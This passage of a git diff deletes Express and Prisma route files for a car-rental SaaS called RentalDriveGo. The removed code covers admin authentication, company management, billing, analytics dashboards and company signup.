'Invalid 2FA code', statusCode: 400 }) - await prisma.adminUser.update({ where: { id: admin.id }, data: { totpEnabled: true } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -const ADMIN_RESET_TOKEN_TTL_MINUTES = 60 - -function ensureAppBasePath(baseUrl: string, basePath: string) { - try { - const url = new URL(baseUrl) - const normalizedPathname = url.pathname.replace(/\/$/, '') - if (normalizedPathname === basePath || normalizedPathname.endsWith(basePath)) { - return url.toString().replace(/\/$/, '') - } - - url.pathname = `${normalizedPathname}${basePath}` || basePath - return url.toString().replace(/\/$/, '') - } catch { - const trimmed = baseUrl.replace(/\/$/, '') - return trimmed.endsWith(basePath) ? trimmed : `${trimmed}${basePath}` - } -} - -router.post('/auth/forgot-password', async (req, res, next) => { - try { - const { email } = z.object({ email: z.string().email().max(255).trim().toLowerCase() }).parse(req.body) - - const admin = await prisma.adminUser.findUnique({ where: { email } }) - if (admin && admin.isActive) { - const rawToken = crypto.randomBytes(32).toString('hex') - const expiresAt = new Date(Date.now() + ADMIN_RESET_TOKEN_TTL_MINUTES * 60 * 1000) - - await prisma.adminUser.update({ - where: { id: admin.id }, - data: { passwordResetToken: rawToken, passwordResetExpiresAt: expiresAt }, - }) - - const adminUrl = ensureAppBasePath( - process.env.ADMIN_URL ?? process.env.NEXT_PUBLIC_ADMIN_URL ?? 'http://localhost:3002/admin', - '/admin', - ) - const resetUrl = `${adminUrl}/reset-password?token=${rawToken}` - - await sendTransactionalEmail({ - to: email, - subject: 'Reset your RentalDriveGo admin password', - html: `

Hi ${admin.firstName},

Reset your admin password here:

Reset password

This link expires in ${ADMIN_RESET_TOKEN_TTL_MINUTES} minutes.

RentalDriveGo

`, - text: `Hi ${admin.firstName},\n\nReset your admin password here: ${resetUrl}\n\nThis link expires in ${ADMIN_RESET_TOKEN_TTL_MINUTES} minutes.\n\nRentalDriveGo`, - }).catch((err) => console.error('[AdminForgotPassword] Email send failed:', err?.message)) - } - - res.json({ data: { message: 'If that email is registered, a reset link has been sent.' } }) - } catch (err) { next(err) } -}) - -router.post('/auth/reset-password', async (req, res, next) => { - try { - const { token, password } = z.object({ - token: z.string().min(1), - password: z.string().min(8).max(128), - }).parse(req.body) - - const admin = await prisma.adminUser.findFirst({ - where: { - passwordResetToken: token, - passwordResetExpiresAt: { gt: new Date() }, - }, - }) - - if (!admin) { - return res.status(400).json({ error: 'invalid_token', message: 'Reset link is invalid or has expired.', statusCode: 400 }) - } - - const passwordHash = await bcrypt.hash(password, 12) - - await prisma.adminUser.update({ - where: { id: admin.id }, - data: { - passwordHash, - passwordResetToken: null, - passwordResetExpiresAt: null, - }, - }) - - res.json({ data: { message: 'Password updated successfully. You can now sign in.' } }) - } catch (err) { next(err) } -}) - -// ─── Companies ──────────────────────────────────────────────── - -router.get('/companies', requireAdminAuth, async (req, res, next) => { - try { - const { q, status, plan, page = '1', pageSize = '20' } = req.query as Record - const where: any = {} - if (status) where.status = status - if (q) where.OR = [{ name: { contains: q, mode: 'insensitive' } }, { email: { contains: q, mode: 'insensitive' } }, { slug: { contains: q, mode: 'insensitive' } }] - if (plan) where.subscription = { plan } - - const [companies, total] = await Promise.all([ - prisma.company.findMany({ - where, - include: { brand: { select: { displayName: true, logoUrl: true, subdomain: true } }, subscription: { select: { plan: true, status: true } }, _count: { select: { employees: true, vehicles: true } } }, - skip: (parseInt(page) - 1) * parseInt(pageSize), - take: parseInt(pageSize), - orderBy: { createdAt: 'desc' }, - }), - prisma.company.count({ where }), - ]) - res.json({ data: companies, total, page: parseInt(page), pageSize: parseInt(pageSize), totalPages: Math.ceil(total / parseInt(pageSize)) }) - } catch (err) { next(err) } -}) - -router.get('/companies/:id', requireAdminAuth, async (req, res, next) => { - try { - const company = await prisma.company.findUniqueOrThrow({ - where: { id: req.params.id }, - include: { - brand: true, - contractSettings: true, - accountingSettings: true, - subscription: { include: { invoices: { orderBy: { createdAt: 'desc' }, take: 10 } } }, - employees: true, - _count: { select: { employees: true, vehicles: true, customers: true, reservations: true } }, - }, - }) - res.json({ data: company }) - } catch (err) { next(err) } -}) - -router.get('/site-config/marketplace-homepage', requireAdminAuth, async (req, res, next) => { - try { - res.json({ data: await getMarketplaceHomepageContent() }) - } catch (err) { next(err) } -}) - -router.patch('/site-config/marketplace-homepage', requireAdminAuth, requireAdminRole('SUPPORT'), async (req, res, next) => { - try { - const { homepage } = z.object({ homepage: marketplaceHomepageConfigSchema }).parse(req.body) - const saved = await saveMarketplaceHomepageContent(homepage) - await prisma.auditLog.create({ - data: { - adminUserId: req.admin.id, - action: 'UPDATE', - resource: 'MarketplaceHomepage', - after: toAuditJson(saved), - ipAddress: req.ip, - userAgent: req.headers['user-agent'], - }, - }) - res.json({ data: saved }) - } catch (err) { next(err) } -}) - -router.patch('/companies/:id', requireAdminAuth, requireAdminRole('SUPPORT'), async (req, res, next) => { - try { - const body = adminCompanyUpdateSchema.parse(req.body) - const before = await prisma.company.findUniqueOrThrow({ - where: { id: req.params.id }, - include: { - brand: true, - contractSettings: true, - accountingSettings: true, - subscription: true, - }, - }) - - const updated = await prisma.$transaction(async (tx) => { - if (body.company) { - await tx.company.update({ - where: { id: req.params.id }, - data: body.company, - }) - } - - if (body.subscription) { - await tx.subscription.upsert({ - where: { companyId: req.params.id }, - update: { - ...body.subscription, - trialStartAt: parseOptionalDate(body.subscription.trialStartAt), - trialEndAt: parseOptionalDate(body.subscription.trialEndAt), - currentPeriodStart: parseOptionalDate(body.subscription.currentPeriodStart), - currentPeriodEnd: parseOptionalDate(body.subscription.currentPeriodEnd), - cancelledAt: parseOptionalDate(body.subscription.cancelledAt), - }, - create: { - companyId: req.params.id, - plan: body.subscription.plan ?? 'STARTER', - billingPeriod: body.subscription.billingPeriod ?? 'MONTHLY', - status: body.subscription.status ?? 'TRIALING', - currency: body.subscription.currency ?? 'MAD', - trialStartAt: parseOptionalDate(body.subscription.trialStartAt), - trialEndAt: parseOptionalDate(body.subscription.trialEndAt), - currentPeriodStart: parseOptionalDate(body.subscription.currentPeriodStart), - currentPeriodEnd: parseOptionalDate(body.subscription.currentPeriodEnd), - cancelledAt: parseOptionalDate(body.subscription.cancelledAt), - cancelAtPeriodEnd: body.subscription.cancelAtPeriodEnd ?? false, - } as any, - }) - } - - if (body.brand) { - const currentCompany = await tx.company.findUniqueOrThrow({ where: { id: req.params.id } }) - await tx.brandSettings.upsert({ - where: { companyId: req.params.id }, - update: body.brand, - create: { - companyId: req.params.id, - displayName: body.brand.displayName ?? currentCompany.name, - subdomain: body.brand.subdomain ?? currentCompany.slug, - paymentMethodsEnabled: before.brand?.paymentMethodsEnabled ?? [], - ...body.brand, - } as any, - }) - } - - if (body.contractSettings) { - await tx.contractSettings.upsert({ - where: { companyId: req.params.id }, - update: body.contractSettings, - create: { - companyId: req.params.id, - ...body.contractSettings, - } as any, - }) - } - - if (body.accountingSettings) { - await tx.accountingSettings.upsert({ - where: { companyId: req.params.id }, - update: body.accountingSettings, - create: { - companyId: req.params.id, - ...body.accountingSettings, - } as any, - }) - } - - return tx.company.findUniqueOrThrow({ - where: { id: req.params.id }, - include: { - brand: true, - contractSettings: true, - accountingSettings: true, - subscription: { include: { invoices: { orderBy: { createdAt: 'desc' }, take: 10 } } }, - employees: true, - _count: { select: { employees: true, vehicles: true, customers: true, reservations: true } }, - }, - }) - }) - - await prisma.auditLog.create({ - data: { - adminUserId: req.admin.id, - action: 'UPDATE_COMPANY', - resource: 'Company', - resourceId: req.params.id, - companyId: req.params.id, - before: toAuditJson(before), - after: toAuditJson(body), - ipAddress: req.ip, - }, - }) - - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.patch('/companies/:id/status', requireAdminAuth, requireAdminRole('SUPPORT'), async (req, res, next) => { - try { - const { status, reason } = z.object({ status: z.enum(['ACTIVE','SUSPENDED','CANCELLED']), reason: z.string().optional() }).parse(req.body) - const before = await prisma.company.findUniqueOrThrow({ where: { id: req.params.id } }) - const updated = await prisma.company.update({ where: { id: req.params.id }, data: { status } }) - await prisma.auditLog.create({ data: { adminUserId: req.admin.id, action: `SET_COMPANY_STATUS_${status}`, resource: 'Company', resourceId: req.params.id, companyId: req.params.id, before: { status: before.status }, after: { status }, note: reason, ipAddress: req.ip } }) - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.delete('/companies/:id', requireAdminAuth, requireAdminRole('ADMIN'), async (req, res, next) => { - try { - await prisma.company.delete({ where: { id: req.params.id } }) - await prisma.auditLog.create({ data: { adminUserId: req.admin.id, action: 'DELETE_COMPANY', resource: 'Company', resourceId: req.params.id, ipAddress: req.ip } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -// ─── Impersonation ──────────────────────────────────────────── - -router.post('/companies/:id/impersonate', requireAdminAuth, requireAdminRole('ADMIN'), async (req, res, next) => { - try { - const company = await prisma.company.findUniqueOrThrow({ where: { id: req.params.id }, include: { employees: { where: { role: 'OWNER' } } } }) - const token = jwt.sign({ companyId: company.id, employeeId: company.employees[0]?.id, isImpersonation: true }, process.env.JWT_SECRET!, { expiresIn: '30m' }) - await prisma.auditLog.create({ data: { adminUserId: req.admin.id, action: 'IMPERSONATE_COMPANY', resource: 'Company', resourceId: company.id, companyId: company.id, ipAddress: req.ip } }) - res.json({ data: { token, expiresIn: 1800 } }) - } catch (err) { next(err) } -}) - -// ─── Renters ────────────────────────────────────────────────── - -router.get('/renters', requireAdminAuth, async (req, res, next) => { - try { - const { q, blocked, page = '1', pageSize = '20' } = req.query as Record - const where: any = {} - if (blocked !== undefined) where.isActive = blocked === 'false' - if (q) where.OR = [{ firstName: { contains: q, mode: 'insensitive' } }, { email: { contains: q, mode: 'insensitive' } }] - const [renters, total] = await Promise.all([ - prisma.renter.findMany({ where, select: { id: true, firstName: true, lastName: true, email: true, phone: true, isActive: true, createdAt: true, _count: { select: { reservations: true } } }, skip: (parseInt(page) - 1) * parseInt(pageSize), take: parseInt(pageSize), orderBy: { createdAt: 'desc' } }), - prisma.renter.count({ where }), - ]) - res.json({ data: renters, total, page: parseInt(page), pageSize: parseInt(pageSize), totalPages: Math.ceil(total / parseInt(pageSize)) }) - } catch (err) { next(err) } -}) - -router.post('/renters/:id/block', requireAdminAuth, requireAdminRole('SUPPORT'), async (req, res, next) => { - try { - await prisma.renter.update({ where: { id: req.params.id }, data: { isActive: false } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.post('/renters/:id/unblock', requireAdminAuth, requireAdminRole('SUPPORT'), async (req, res, next) => { - try { - await prisma.renter.update({ where: { id: req.params.id }, data: { isActive: true } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -// ─── Metrics ────────────────────────────────────────────────── - -router.get('/metrics', requireAdminAuth, requireAdminRole('FINANCE'), async (req, res, next) => { - try { - const [totalCompanies, activeCompanies, trialingCompanies, suspendedCompanies, totalRenters, totalReservations] = await Promise.all([ - prisma.company.count(), - prisma.company.count({ where: { status: 'ACTIVE' } }), - prisma.company.count({ where: { status: 'TRIALING' } }), - prisma.company.count({ where: { status: 'SUSPENDED' } }), - prisma.renter.count(), - prisma.reservation.count(), - ]) - res.json({ data: { totalCompanies, activeCompanies, trialingCompanies, suspendedCompanies, totalRenters, totalReservations } }) - } catch (err) { next(err) } -}) - -// ─── Audit Log ──────────────────────────────────────────────── - -router.get('/audit-logs', requireAdminAuth, requireAdminRole('ADMIN'), async (req, res, next) => { - try { - const { adminId, action, companyId, entityId, page = '1', pageSize = '50' } = req.query as Record - const where: any = {} - if (adminId) where.adminUserId = adminId - if (action) where.action = { contains: action } - if (companyId) where.companyId = companyId - if (entityId) where.resourceId = entityId - const [logs, total] = await Promise.all([ - prisma.auditLog.findMany({ where, include: { adminUser: { select: { firstName: true, lastName: true, email: true } } }, skip: (parseInt(page) - 1) * parseInt(pageSize), take: parseInt(pageSize), orderBy: { createdAt: 'desc' } }), - prisma.auditLog.count({ where }), - ]) - res.json({ data: logs, total, page: parseInt(page), pageSize: parseInt(pageSize), totalPages: Math.ceil(total / parseInt(pageSize)) }) - } catch (err) { next(err) } -}) - -// ─── Admin Users (SUPER_ADMIN only) ─────────────────────────── - -router.get('/admins', requireAdminAuth, requireAdminRole('SUPER_ADMIN'), async (req, res, next) => { - try { - const admins = await prisma.adminUser.findMany({ - select: { - id: true, - email: true, - firstName: true, - lastName: true, - role: true, - isActive: true, - totpEnabled: true, - lastLoginAt: true, - createdAt: true, - permissions: true, - }, - }) - res.json({ data: admins }) - } catch (err) { next(err) } -}) - -router.post('/admins', requireAdminAuth, requireAdminRole('SUPER_ADMIN'), async (req, res, next) => { - try { - const body = z.object({ - email: z.string().email(), - firstName: z.string(), - lastName: z.string(), - role: z.enum(['SUPER_ADMIN', 'ADMIN', 'SUPPORT', 'FINANCE', 'VIEWER']), - password: z.string().min(8), - permissions: z.array(permissionSchema).optional(), - }).parse(req.body) - const passwordHash = await bcrypt.hash(body.password, 12) - const admin = await prisma.adminUser.create({ - data: { - email: body.email, - firstName: body.firstName, - lastName: body.lastName, - role: body.role, - passwordHash, - permissions: body.permissions ? { - create: body.permissions, - } : undefined, - }, - include: { permissions: true }, - }) - const { passwordHash: _, ...safe } = admin - res.status(201).json({ data: safe }) - } catch (err) { next(err) } -}) - -router.patch('/admins/:id/role', requireAdminAuth, requireAdminRole('SUPER_ADMIN'), async (req, res, next) => { - try { - const { role } = z.object({ role: z.enum(['SUPER_ADMIN', 'ADMIN','SUPPORT','FINANCE','VIEWER']) }).parse(req.body) - await prisma.adminUser.update({ where: { id: req.params.id }, data: { role } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.patch('/admins/:id/permissions', requireAdminAuth, requireAdminRole('SUPER_ADMIN'), async (req, res, next) => { - try { - const { permissions } = z.object({ permissions: z.array(permissionSchema) }).parse(req.body) - await prisma.adminUser.findUniqueOrThrow({ where: { id: req.params.id } }) - await prisma.$transaction([ - prisma.adminPermission.deleteMany({ where: { adminUserId: req.params.id } }), - prisma.adminPermission.createMany({ - data: permissions.map((permission) => ({ - adminUserId: req.params.id, - resource: permission.resource, - actions: permission.actions, - })) as any, - }), - ]) - const admin = await prisma.adminUser.findUniqueOrThrow({ - where: { id: req.params.id }, - include: { permissions: true }, - }) - res.json({ data: admin }) - } catch (err) { next(err) } -}) - -// ─── Billing ────────────────────────────────────────────────── - -const PLAN_MONTHLY_AMOUNT: Record = { - STARTER: 29900, - GROWTH: 59900, - PRO: 99900, -} - -router.get('/billing', requireAdminAuth, requireAdminRole('FINANCE'), async (req, res, next) => { - try { - const { status, plan, page = '1', pageSize = '20' } = req.query as Record - const where: any = {} - if (status) where.status = status - if (plan) where.plan = plan - - const [subscriptions, total] = await Promise.all([ - prisma.subscription.findMany({ - where, - include: { - company: { select: { id: true, name: true, email: true, slug: true, status: true } }, - invoices: { select: { id: true, amount: true, currency: true, status: true, paidAt: true, createdAt: true }, orderBy: { createdAt: 'desc' }, take: 5 }, - _count: { select: { invoices: true } }, - }, - skip: (parseInt(page) - 1) * parseInt(pageSize), - take: parseInt(pageSize), - orderBy: { createdAt: 'desc' }, - }), - prisma.subscription.count({ where }), - ]) - - const activeStatuses = ['ACTIVE', 'TRIALING'] as any[] - const allActive = await prisma.subscription.findMany({ - where: { status: { in: activeStatuses } }, - select: { plan: true, billingPeriod: true, currency: true }, - }) - - let mrr = 0 - for (const sub of allActive) { - const monthly = PLAN_MONTHLY_AMOUNT[sub.plan] ?? 0 - mrr += sub.billingPeriod === 'ANNUAL' ? Math.round(monthly * 10 / 12) : monthly - } - - const [activeCount, trialingCount, pastDueCount, cancelledCount] = await Promise.all([ - prisma.subscription.count({ where: { status: 'ACTIVE' } }), - prisma.subscription.count({ where: { status: 'TRIALING' } }), - prisma.subscription.count({ where: { status: 'PAST_DUE' } }), - prisma.subscription.count({ where: { status: 'CANCELLED' } }), - ]) - - res.json({ - data: subscriptions, - total, - page: parseInt(page), - pageSize: parseInt(pageSize), - totalPages: Math.ceil(total / parseInt(pageSize)), - stats: { mrr, activeCount, trialingCount, pastDueCount, cancelledCount }, - }) - } catch (err) { next(err) } -}) - -router.get('/billing/:companyId/invoices', requireAdminAuth, requireAdminRole('FINANCE'), async (req, res, next) => { - try { - const { page = '1', pageSize = '20' } = req.query as Record - const [invoices, total] = await Promise.all([ - prisma.subscriptionInvoice.findMany({ - where: { companyId: req.params.companyId }, - orderBy: { createdAt: 'desc' }, - skip: (parseInt(page) - 1) * parseInt(pageSize), - take: parseInt(pageSize), - }), - prisma.subscriptionInvoice.count({ where: { companyId: req.params.companyId } }), - ]) - res.json({ data: invoices, total, page: parseInt(page), pageSize: parseInt(pageSize), totalPages: Math.ceil(total / parseInt(pageSize)) }) - } catch (err) { next(err) } -}) - -router.get('/billing/invoices/:invoiceId/pdf', requireAdminAuth, requireAdminRole('FINANCE'), async (req, res, next) => { - try { - const invoice = await prisma.subscriptionInvoice.findUniqueOrThrow({ - where: { id: req.params.invoiceId }, - include: { - company: { select: { name: true, email: true, phone: true, address: true } }, - subscription: { select: { plan: true, billingPeriod: true, currency: true, currentPeriodStart: true, currentPeriodEnd: true } }, - }, - }) - - const invoiceNumber = buildInvoiceNumber(invoice.id, invoice.createdAt) - const transactionId = invoice.amanpayTransactionId ?? invoice.paypalCaptureId ?? null - - const pdfBuffer = await generateInvoicePdf({ - invoiceNumber, - issueDate: invoice.createdAt.toISOString(), - dueDate: invoice.status === 'PENDING' ? invoice.createdAt.toISOString() : null, - company: { - name: invoice.company.name, - email: invoice.company.email, - phone: invoice.company.phone, - address: invoice.company.address, - }, - subscription: { - plan: invoice.subscription.plan, - billingPeriod: invoice.subscription.billingPeriod, - currentPeriodStart: invoice.subscription.currentPeriodStart?.toISOString(), - currentPeriodEnd: invoice.subscription.currentPeriodEnd?.toISOString(), - currency: invoice.subscription.currency, - }, - amount: invoice.amount, - currency: invoice.currency, - status: invoice.status, - paymentProvider: invoice.paymentProvider, - transactionId, - paidAt: invoice.paidAt?.toISOString(), - }) - - res.setHeader('Content-Type', 'application/pdf') - res.setHeader('Content-Disposition', `attachment; filename="${invoiceNumber}.pdf"`) - res.setHeader('Content-Length', pdfBuffer.length) - res.end(pdfBuffer) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/analytics.ts b/apps/api/src/routes/analytics.ts deleted file mode 100644 index 6705dc1..0000000 --- a/apps/api/src/routes/analytics.ts +++ /dev/null @@ -1,181 +0,0 @@ -import { Router } from 'express' -import { prisma } from '../lib/prisma' -import { requireCompanyAuth } from '../middleware/requireCompanyAuth' -import { requireTenant } from '../middleware/requireTenant' -import { requireSubscription } from '../middleware/requireSubscription' -import { requireRole } from '../middleware/requireRole' -import { generateFinancialReport, toCsv } from '../services/financialReportService' - -const router = Router() -router.use(requireCompanyAuth, requireTenant, requireSubscription) - -function getRangeFromPeriod(period: string) { - const now = new Date() - - switch (period) { - case 'WEEKLY': { - const start = new Date(now) - start.setDate(now.getDate() - 7) - return { from: start, to: now } - } - case 'QUARTERLY': { - const start = new Date(now.getFullYear(), now.getMonth() - 2, 1) - return { from: start, to: now } - } - case 'ANNUAL': { - const start = new Date(now.getFullYear(), 0, 1) - return { from: start, to: now } - } - case 'MONTHLY': - default: - return { from: new Date(now.getFullYear(), now.getMonth(), 1), to: now } - } -} - -router.get('/summary', async (req, res, next) => { - try { - const { period = '30d' } = req.query as Record - const days = parseInt(period.replace('d', '')) || 30 - const since = new Date(Date.now() - days * 24 * 60 * 60 * 1000) - - const [totalReservations, activeVehicles, totalRevenue, totalCustomers] = await Promise.all([ - prisma.reservation.count({ where: { companyId: req.companyId, createdAt: { gte: since } } }), - prisma.vehicle.count({ where: { companyId: req.companyId, status: 'AVAILABLE' } }), - prisma.reservation.aggregate({ where: { companyId: req.companyId, status: { in: ['COMPLETED'] }, createdAt: { gte: since } }, _sum: { totalAmount: true } }), - prisma.customer.count({ where: { companyId: req.companyId } }), - ]) - - res.json({ data: { totalReservations, activeVehicles, totalRevenue: totalRevenue._sum.totalAmount ?? 0, totalCustomers, period } }) - } catch (err) { next(err) } -}) - -router.get('/dashboard', async (req, res, next) => { - try { - const now = new Date() - const monthStart = new Date(now.getFullYear(), now.getMonth(), 1) - const prevMonthStart = new Date(now.getFullYear(), now.getMonth() - 1, 1) - const prevMonthEnd = new Date(monthStart.getTime() - 1) - - const [ - totalBookings, - previousBookings, - activeVehicles, - previousActiveVehicles, - totalCustomers, - previousCustomers, - monthlyRevenueAgg, - previousRevenueAgg, - recentReservations, - sourceGroups, - subscription, - ] = await Promise.all([ - prisma.reservation.count({ where: { companyId: req.companyId, createdAt: { gte: monthStart } } }), - prisma.reservation.count({ where: { companyId: req.companyId, createdAt: { gte: prevMonthStart, lte: prevMonthEnd } } }), - prisma.vehicle.count({ where: { companyId: req.companyId, status: { in: ['AVAILABLE', 'RENTED'] } } }), - prisma.vehicle.count({ where: { companyId: req.companyId, createdAt: { lte: prevMonthEnd }, status: { in: ['AVAILABLE', 'RENTED'] } } }), - prisma.customer.count({ where: { companyId: req.companyId } }), - prisma.customer.count({ where: { companyId: req.companyId, createdAt: { lte: prevMonthEnd } } }), - prisma.reservation.aggregate({ where: { companyId: req.companyId, status: { in: ['CONFIRMED', 'ACTIVE', 'COMPLETED'] }, createdAt: { gte: monthStart } }, _sum: { totalAmount: true } }), - prisma.reservation.aggregate({ where: { companyId: req.companyId, status: { in: ['CONFIRMED', 'ACTIVE', 'COMPLETED'] }, createdAt: { gte: prevMonthStart, lte: prevMonthEnd } }, _sum: { totalAmount: true } }), - prisma.reservation.findMany({ - where: { companyId: req.companyId }, - include: { customer: true, vehicle: true }, - orderBy: { createdAt: 'desc' }, - take: 8, - }), - prisma.reservation.groupBy({ - by: ['source'], - where: { companyId: req.companyId }, - _count: { id: true }, - _sum: { totalAmount: true }, - }), - prisma.subscription.findUnique({ where: { companyId: req.companyId } }), - ]) - - const pct = (current: number, previous: number) => { - if (previous === 0) return current > 0 ? 100 : 0 - return Math.round(((current - previous) / previous) * 100) - } - - const typedRecentReservations = recentReservations as Array<{ - id: string - contractNumber: string | null - startDate: Date - endDate: Date - status: string - totalAmount: number - customer: { firstName: string; lastName: string } - vehicle: { make: string; model: string } - }> - - const typedSourceGroups = sourceGroups as Array<{ - source: string - _count: { id: number } - _sum: { totalAmount: number | null } - }> - - res.json({ - data: { - kpis: { - totalBookings, - activeVehicles, - monthlyRevenue: monthlyRevenueAgg._sum.totalAmount ?? 0, - totalCustomers, - bookingsChange: pct(totalBookings, previousBookings), - vehiclesChange: pct(activeVehicles, previousActiveVehicles), - revenueChange: pct(monthlyRevenueAgg._sum.totalAmount ?? 0, previousRevenueAgg._sum.totalAmount ?? 0), - customersChange: pct(totalCustomers, previousCustomers), - }, - recentReservations: typedRecentReservations.map((reservation) => ({ - id: reservation.id, - bookingRef: reservation.contractNumber ?? reservation.id.slice(-8).toUpperCase(), - customerName: `${reservation.customer.firstName} ${reservation.customer.lastName}`, - vehicleName: `${reservation.vehicle.make} ${reservation.vehicle.model}`, - startDate: reservation.startDate, - endDate: reservation.endDate, - status: reservation.status, - totalAmount: reservation.totalAmount, - })), - sourceBreakdown: typedSourceGroups.map((group) => ({ - source: group.source, - count: group._count.id, - revenue: group._sum.totalAmount ?? 0, - })), - subscription: subscription ? { - status: subscription.status, - planName: subscription.plan, - trialEndsAt: subscription.trialEndAt, - } : null, - }, - }) - } catch (err) { next(err) } -}) - -router.get('/sources', async (req, res, next) => { - try { - const sources = await prisma.reservation.groupBy({ by: ['source'], where: { companyId: req.companyId }, _count: { id: true } }) - res.json({ data: sources }) - } catch (err) { next(err) } -}) - -router.get('/report', requireRole('MANAGER'), async (req, res, next) => { - try { - const { from, to, format = 'JSON', period } = req.query as Record - const accountingSettings = await prisma.accountingSettings.findUnique({ where: { companyId: req.companyId } }) - const derivedRange = getRangeFromPeriod(period || accountingSettings?.reportingPeriod || 'MONTHLY') - const startDate = from ? new Date(from) : derivedRange.from - const endDate = to ? new Date(to) : derivedRange.to - - const report = await generateFinancialReport(req.companyId, startDate, endDate) - - if (format === 'CSV') { - res.setHeader('Content-Type', 'text/csv') - res.setHeader('Content-Disposition', `attachment; filename="report-${startDate.toISOString().slice(0, 10)}-${endDate.toISOString().slice(0, 10)}.csv"`) - return res.send(toCsv(report.rows)) - } - - res.json({ data: report }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/auth.company.ts b/apps/api/src/routes/auth.company.ts deleted file mode 100644 index 0c810a7..0000000 --- a/apps/api/src/routes/auth.company.ts +++ /dev/null @@ -1,255 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import bcrypt from 'bcryptjs' -import { prisma } from '../lib/prisma' -import { sendNotification } from '../services/notificationService' -import { signupEmail, type Lang } from '../lib/emailTranslations' - -const router = Router() - -const signupSchema = z.object({ - firstName: z.string().min(1).max(80), - lastName: z.string().min(1).max(80), - email: z.string().email(), - password: z.string().min(8).max(128), - companyName: z.string().min(2).max(120), - legalForm: z.string().min(1).max(80), - registrationNumber: z.string().min(1).max(120), - streetAddress: z.string().min(1).max(200), - city: z.string().min(1).max(120), - country: z.string().min(1).max(120), - zipCode: z.string().min(1).max(40), - companyPhone: z.string().min(1).max(80), - fax: z.string().max(80).optional(), - yearsActive: z.string().min(1).max(80), - preferredLanguage: z.enum(['en', 'fr', 'ar']).default('en'), - plan: z.enum(['STARTER', 'GROWTH', 'PRO']), - billingPeriod: z.enum(['MONTHLY', 'ANNUAL']), - currency: z.enum(['MAD', 'USD', 'EUR']), - paymentProvider: z.enum(['AMANPAY', 'PAYPAL']), -}) - -type EmailDeliveryResult = { - attempted: boolean - success: boolean - error: string | null -} - -function slugifyCompanyName(value: string) { - return value - .toLowerCase() - .replace(/[^a-z0-9]+/g, '-') - .replace(/^-+|-+$/g, '') - .slice(0, 50) || 'company' -} - -async function generateUniqueSlug(baseName: string) { - const base = slugifyCompanyName(baseName) - - for (let attempt = 0; attempt < 25; attempt += 1) { - const slug = attempt === 0 ? base : `${base}-${attempt + 1}` - const existing = await prisma.company.findUnique({ where: { slug } }) - if (!existing) return slug - } - - return `${base}-${Date.now().toString(36)}` -} - -function addDays(date: Date, days: number) { - return new Date(date.getTime() + days * 24 * 60 * 60 * 1000) -} - -function buildSignupConfirmationEmail(opts: { - firstName: string - companyName: string - plan: 'STARTER' | 'GROWTH' | 'PRO' - billingPeriod: 'MONTHLY' | 'ANNUAL' - currency: 'MAD' | 'USD' | 'EUR' - paymentProvider: 'AMANPAY' | 'PAYPAL' - trialEndAt: Date - lang: Lang -}) { - return signupEmail.text({ - firstName: opts.firstName.trim() || 'there', - companyName: opts.companyName, - plan: opts.plan, - billingPeriod: opts.billingPeriod, - currency: opts.currency, - paymentProvider: opts.paymentProvider, - trialEnd: opts.trialEndAt, - }, opts.lang) -} - -async function sendSignupEmailNotification(opts: Parameters[0]): Promise { - const result = await sendNotification(opts) - const emailResult = result.find((entry) => entry.channel === 'EMAIL') - - if (!emailResult) { - return { attempted: false, success: false, error: null } - } - - return { - attempted: true, - success: emailResult.success, - error: emailResult.error ?? null, - } -} - -router.post('/signup', async (req, res, next) => { - try { - const body = signupSchema.parse(req.body) - - const existingCompany = await prisma.company.findUnique({ where: { email: body.email } }) - if (existingCompany) { - return res.status(409).json({ - error: 'email_taken', - message: 'A company account with this email already exists', - statusCode: 409, - }) - } - - const existingEmployee = await prisma.employee.findFirst({ where: { email: body.email } }) - if (existingEmployee) { - return res.status(409).json({ - error: 'email_taken', - message: 'An employee account with this email already exists', - statusCode: 409, - }) - } - - const slug = await generateUniqueSlug(body.companyName) - const now = new Date() - const trialEndAt = addDays(now, 14) - const passwordHash = await bcrypt.hash(body.password, 12) - - const result = await prisma.$transaction(async (tx) => { - const company = await tx.company.create({ - data: { - name: body.companyName, - slug, - email: body.email, - phone: body.companyPhone, - address: { - streetAddress: body.streetAddress, - city: body.city, - country: body.country, - zipCode: body.zipCode, - legalForm: body.legalForm, - managerName: `${body.firstName} ${body.lastName}`.trim(), - fax: body.fax || null, - yearsActive: body.yearsActive, - }, - status: 'TRIALING', - }, - }) - - await tx.brandSettings.create({ - data: { - companyId: company.id, - displayName: body.companyName, - subdomain: slug, - publicEmail: body.email, - publicPhone: body.companyPhone, - publicAddress: body.streetAddress, - publicCity: body.city, - publicCountry: body.country, - defaultCurrency: body.currency, - }, - }) - - await tx.contractSettings.create({ - data: { - companyId: company.id, - legalName: body.companyName, - registrationNumber: body.registrationNumber, - }, - }) - - await tx.subscription.create({ - data: { - companyId: company.id, - plan: body.plan, - billingPeriod: body.billingPeriod, - currency: body.currency, - status: 'TRIALING', - trialStartAt: now, - trialEndAt, - currentPeriodStart: now, - currentPeriodEnd: trialEndAt, - }, - }) - - const employee = await tx.employee.create({ - data: { - companyId: company.id, - clerkUserId: `local_owner_${company.id}`, - firstName: body.firstName, - lastName: body.lastName, - email: body.email, - phone: body.companyPhone, - passwordHash, - role: 'OWNER', - preferredLanguage: body.preferredLanguage, - isActive: true, - }, - }) - - return { - company, - employeeId: employee.id, - } - }) - - const emailDelivery = await sendSignupEmailNotification({ - type: 'SUBSCRIPTION_TRIAL_ENDING', - title: signupEmail.subject(body.preferredLanguage), - body: buildSignupConfirmationEmail({ - firstName: body.firstName, - companyName: body.companyName, - plan: body.plan, - billingPeriod: body.billingPeriod, - currency: body.currency, - paymentProvider: body.paymentProvider, - trialEndAt, - lang: body.preferredLanguage, - }), - companyId: result.company.id, - employeeId: result.employeeId, - email: body.email, - channels: ['EMAIL', 'IN_APP'], - locale: body.preferredLanguage, - }) - - res.status(201).json({ - data: { - companyId: result.company.id, - companyName: result.company.name, - slug: result.company.slug, - invitationId: null, - trialEndsAt: 